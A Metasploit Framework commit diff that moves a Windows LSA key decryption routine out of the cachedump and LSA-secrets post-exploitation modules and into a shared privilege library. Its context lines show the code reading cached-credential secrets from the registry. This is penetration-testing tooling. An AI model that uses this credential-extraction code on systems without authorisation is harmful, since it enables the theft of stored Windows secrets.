move decrypt_lsa to priv as well

2013-10-16 23:53:33 -04:00 · 2013-10-16 23:53:33 -04:00 · 541d932d77
parent 60d8ee1434
commit 541d932d77
3 changed files with 28 additions and 52 deletions
--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@ -194,5 +194,33 @@ module Msf::Post::Windows::Priv
    return lsakey
  end

+  #
+  # Decrypts the LSA key
+  #
+  def decrypt_lsa(pol, encryptedkey)
+
+    sha256x = Digest::SHA256.new()
+    sha256x << encryptedkey
+    (1..1000).each do
+      sha256x << pol[28,32]
+    end
+
+    aes = OpenSSL::Cipher::Cipher.new("aes-256-cbc")
+    aes.key = sha256x.digest
+
+    vprint_status("digest #{sha256x.digest.unpack("H*")[0]}")
+
+    decryptedkey = ''
+
+    for i in (60...pol.length).step(16)
+      aes.decrypt
+      aes.padding = 0
+      xx = aes.update(pol[i...i+16])
+      decryptedkey += xx
+    end
+    vprint_good("Dec_Key #{decryptedkey}")
+
+    return decryptedkey
+  end

 end
--- a/modules/post/windows/gather/cachedump.rb
+++ b/modules/post/windows/gather/cachedump.rb
@ -83,31 +83,6 @@ class Metasploit3 < Msf::Post

  end

-  def decrypt_lsa(pol, encryptedkey)
-
-    sha256x = Digest::SHA256.new()
-    sha256x << encryptedkey
-    (1..1000).each do
-      sha256x << pol[28,32]
-    end
-
-    aes = OpenSSL::Cipher::Cipher.new("aes-256-cbc")
-    aes.key = sha256x.digest
-
-    print_status("digest #{sha256x.digest.unpack("H*")[0]}") if( datastore['DEBUG'] )
-
-    decryptedkey = ''
-
-    for i in (60...pol.length).step(16)
-      aes.decrypt
-      aes.padding = 0
-      xx = aes.update(pol[i...i+16])
-      decryptedkey += xx
-    end
-
-    return decryptedkey
-  end
-
  def capture_nlkm(lsakey)
    ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\Secrets\\NL$KM\\CurrVal", KEY_READ)
    nlkm = ok.query_value("").data
--- a/modules/post/windows/gather/credentials/lsa.rb
+++ b/modules/post/windows/gather/credentials/lsa.rb
@ -60,33 +60,6 @@ class Metasploit3 < Msf::Post

  end

-  def decrypt_lsa(pol, encryptedkey)
-
-    sha256x = Digest::SHA256.new()
-    sha256x << encryptedkey
-    (1..1000).each do
-      sha256x << pol[28,32]
-    end
-
-    aes = OpenSSL::Cipher::Cipher.new("aes-256-cbc")
-    aes.key = sha256x.digest
-
-    vprint_status("digest #{sha256x.digest.unpack("H*")[0]}")
-
-    decryptedkey = ''
-
-    for i in (60...pol.length).step(16)
-      aes.decrypt
-      aes.padding = 0
-      xx = aes.update(pol[i...i+16])
-      decryptedkey += xx
-    end
-    vprint_good("Dec_Key #{decryptedkey}")
-
-    return decryptedkey
-  end
-
-
  def reg_getvaldata(key,valname)
    v = nil
    begin